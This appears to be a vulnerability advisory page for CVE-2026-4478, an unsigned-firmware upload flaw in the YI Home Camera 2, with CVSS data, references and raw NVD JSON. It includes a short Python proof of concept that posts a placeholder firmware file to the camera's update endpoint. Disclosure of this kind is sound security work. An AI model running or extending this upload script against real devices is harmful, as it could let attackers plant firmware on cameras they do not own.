CVE-2026-4478

Description

A vulnerability was identified in Yi Technology YI Home Camera 2 2.1.1_20171024151200. This impacts an unknown function of the file home/web/ipc of the component HTTP Firmware Update Handler. The manipulation leads to improper verification of cryptographic signature. The attack is possible to be carried out remotely. The complexity of an attack is rather high. The exploitability is said to be difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Yi Technology YI Home Camera 2 2.1.1_20171024151200

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target_ip):
    """
    PoC for CVE-2026-4478
    Exploits improper verification of cryptographic signature in firmware update.
    """
    url = f"http://{target_ip}/home/web/ipc"
    
    # Simulate malicious firmware payload
    payload = b"\x00" * 1024  # Dummy payload
    
    files = {
        'file': ('malicious_firmware.bin', payload, 'application/octet-stream')
    }
    
    try:
        print(f"[*] Sending malicious firmware to {target_ip}...")
        response = requests.post(url, files=files, timeout=10)
        if response.status_code == 200:
            print("[+] Exploit successful: Firmware uploaded.")
        else:
            print(f"[-] Exploit failed: Server returned {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_ip>")
    else:
        exploit(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4478
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4478
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4478/
[4] VulDB https://vuldb.com/cve/CVE-2026-4478
[5] https://vuldb.com/?ctiid.351768
[6] https://vuldb.com/?id.351768
[7] https://vuldb.com/?submit.773162

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4478", "sourceIdentifier": "[email protected]", "published": "2026-03-20T07:16:14.713", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Yi Technology YI Home Camera 2 2.1.1_20171024151200. This impacts an unknown function of the file home/web/ipc of the component HTTP Firmware Update Handler. The manipulation leads to improper verification of cryptographic signature. The attack is possible to be carried out remotely. The complexity of an attack is rather high. The exploitability is said to be difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad fue identificada en Yi Technology YI Home Camera 2 2.1.1_20171024151200. Esto afecta una función desconocida del archivo home/web/ipc del componente Gestor de Actualización de Firmware HTTP. La manipulación lleva a una verificación incorrecta de la firma criptográfica. El ataque es posible de llevar a cabo remotamente. La complejidad de un ataque es bastante alta. La explotabilidad se dice que es difícil. El exploit está disponible públicamente y podría ser usado. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "baseScore": 7.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 4.9, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-345"}, {"lang": "en", "value": "CWE-347"}]}], "references": [{"url": "https://vuldb.com/?ctiid.351768", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351768", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.773162", "source": "[email protected]"}]}}